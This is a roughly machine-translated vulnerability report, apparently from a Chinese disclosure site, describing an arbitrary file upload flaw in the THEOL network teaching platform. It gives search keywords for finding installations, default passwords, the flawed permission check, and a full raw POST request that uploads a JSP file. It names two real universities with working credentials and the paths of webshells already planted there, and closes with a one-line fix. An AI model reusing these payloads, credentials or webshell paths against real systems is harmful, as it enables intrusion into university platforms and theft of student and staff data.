THEOL network teaching integrated platform general-purpose Arbitrary File Upload

THEOL network teaching integrated platform general-purpose Arbitrary File Upload

Any file is uploaded somewhere in the system.

The full name of the system is "THEOL Tsinghua Education Online" Network Teaching comprehensive platform, which is provided by the Institute of Educational Technology of Tsinghua University. It is deployed in most colleges and universities nationwide and is used for course selection, scoring, online examination, etc.



Keywords:

Inurl: eol/homepage/common/

Or: Welcome to the integrated network teaching platform.
 

1 # log on to the system as an account

Account example:

Teacher

Theol_teacher

Teacher_p

Theol_student

And Baidu's student ID

Password:

123456

000000

And Baidu's student ID



2 # the course description can be uploaded as needed in the teaching video.

Page:

Http: // */eol/popups/jpkrecord/upload_file.jsp? CourseId = *

In its code, the user's permissions are judged. If a common permission account is logged on, an error is returned. If the admin account is logged on, other permissions are judged.

If (! Um. checkPermission (User. USER_PERM_JPKADMIN_BASIC) & (column. getCourse (). getCourseRecordOperational () = JPKConstant. COLUMN_OPERATIONAL_FALSE | um. getID ()! = Column. getCourse (). getInstructorId () throw new JspException ("You do not have permission! ");... Omitting n rows <form action =" <% = um. checkPermission (User. USER_PERM_JPKADMIN_BASIC )? Response. encodeURL ("admin_receive.jsp"): response. encodeURL ("receive. jsp ") %>" enctype = "multipart/form-data" method = "post" name = "uploadForm" id = "uploadForm">

All right, let's just look at the receive. jsp on the upload call page,

Http: // */eol/popups/jpkrecord/receive. jsp

In its code, it only determines whether the user is valid or not, and even contains inexplicable comments.

<% UserManager um = (UserManager) session. getAttribute ("um"); if (! Um. checkPermission (User. USER_PERM_USER_BASIC) throw new JspException ("You do not have permission! "); %>... Omit // fu. setAllowFiles (" .txt0000.jpg).bmp ).rm0000.rmvb0000.htm0000.exe;. avi ");

The user permissions that can be logged on normally are 4098 Status values 4098
 

For details, refer to (different versions may have different paths)

Eol/web/WEB-INF/classes/net/theol/projects/eol2004/user. class


 

That is, if you log on to the system using any account that allows you to log on to the system, you can directly POST the following data to the server. Note that the corresponding "*" location is replaced.

POST http://*/eol/popups/jpkrecord/receive.jsp HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://*/eol/popups/jpkrecord/upload_file.jsp?columnId=7262Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Content-Type: multipart/form-data; boundary=---------------------------7de1fc3b1c0c26Accept-Encoding: gzip, deflateHost: *Content-Length: 420Connection: Keep-AlivePragma: no-cacheCookie: JSESSIONID=*; helpperm=95-----------------------------7de1fc3b1c0c26Content-Disposition: form-data; name="rd"columnId=7262-----------------------------7de1fc3b1c0c26Content-Disposition: form-data; name="fileid"; filename="1.jsp"Content-Type: application/octet-streamtest-----------------------------7de1fc3b1c0c26Content-Disposition: form-data; name="addFile"?? ??-----------------------------7de1fc3b1c0c26--

 

Taking Donghua University of Technology as an example: (theol_student/123456)

Http://eol.ecit.cn/eol/homepage/common/opencourse/


 

Access address:

Http://eol.ecit.cn/eol/data/jpk/0/1.jsp
 

 

POST http://eol.ecit.cn/eol/popups/jpkrecord/receive.jsp HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://eol.ecit.cn/eol/popups/jpkrecord/upload_file.jsp?columnId=7262Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Content-Type: multipart/form-data; boundary=---------------------------7de1fc3b1c0c26Accept-Encoding: gzip, deflateHost: eol.ecit.cnContent-Length: 410Connection: Keep-AlivePragma: no-cacheCookie: JSESSIONID=A95906ABE55FCFDB9CAAFC5FB538181F.T5; JSESSIONID=6DA317CE3259325E42057DBCF09825C3.T5; helpperm=95-----------------------------7de1fc3b1c0c26Content-Disposition: form-data; name="rd"columnId=7262-----------------------------7de1fc3b1c0c26Content-Disposition: form-data; name="fileid"; filename="1.jsp"Content-Type: application/octet-streamtest-----------------------------7de1fc3b1c0c26Content-Disposition: form-data; name="addFile"?? ??-----------------------------7de1fc3b1c0c26--

Knife:

Http://eol.ecit.cn/eol/data/jpk/0/2.jsp (sqzr)
 

As for how to take off your pants, everyone will leave it alone.

The following cases can be reproduced:

Xiamen University course.xmu.edu.cn :( theol_teacher/123456)

Http://course.xmu.edu.cn/meol/data/jpk/0/wooyun.jsp
 

 

 

Note: You can only use POST for normal access to the deprecated horse.

Solution:

Click Upload to filter out weak passwords. It is recommended that the passwords do not exist in the EOL_USER table in plain text.